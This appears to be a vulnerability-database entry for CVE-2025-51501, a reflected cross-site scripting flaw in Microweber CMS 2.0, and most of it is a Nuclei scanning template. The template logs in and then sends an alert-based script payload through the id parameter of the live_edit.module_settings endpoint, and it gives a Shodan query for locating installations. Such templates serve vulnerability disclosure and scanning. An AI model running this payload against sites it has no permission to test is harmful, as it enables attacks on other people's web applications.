CVE-2025-51501: Microweber CMS2.0 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Microweber CMS2.0 | POC: 已公开

漏洞描述

Reflected Cross-Site Scripting (XSS) in the `id` parameter of the `live_edit.module_settings` API endpoint in Microweber CMS2.0 allows execution of arbitrary JavaScript.

PoC代码[已公开]

id: CVE-2025-51501

info:
  name: Microweber CMS2.0 - Cross-Site Scripting
  author: nukunga
  severity: medium
  description: |
    Reflected Cross-Site Scripting (XSS) in the `id` parameter of the `live_edit.module_settings` API endpoint in Microweber CMS2.0 allows execution of arbitrary JavaScript.
  reference:
    - https://github.com/progprnv/CVE-Reports/blob/main/CVE-2025-51501
    - https://nvd.nist.gov/vuln/detail/CVE-2025-51501
  metadata:
    verified: true
    max-requests: 2
    vendor: microweber
    product: microweber
    shodan-query: 'http.title:"Microweber"'
  tags: cve,cve2025,microweber,xss,authenticated

flow: http(1) && http(2)

variables:
  xss_payload: "</script><script>alert(document.domain)</script>"

http:
  - raw:
      - |
        POST /api/user_login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8

        username={{username}}&password={{password}}&lang=en_US&where_to=admin_content

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains_all(body, "success\":", "username\":")'
        condition: and
        internal: true

  - raw:
      - |
        GET /api/live_edit/live_edit.module_settings?id={{xss_payload}}&type=shop/shipping/gateways/country/admin HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "text/html")'
          - 'contains_all(body, "</script><script>alert(document.domain)</script>", "Add Country</a>")'
        condition: and
# digest: 490a004630440220601ac0d63e8405fe11c4888a15d30cda654988bc0db716e36a7fdcc278026bf7022052ded3c84f5b404e4b3b17f2b08e651bfc16459022cecf52786083943c8e7492:922c64590222798bb761d5b6d8e72950

相关漏洞推荐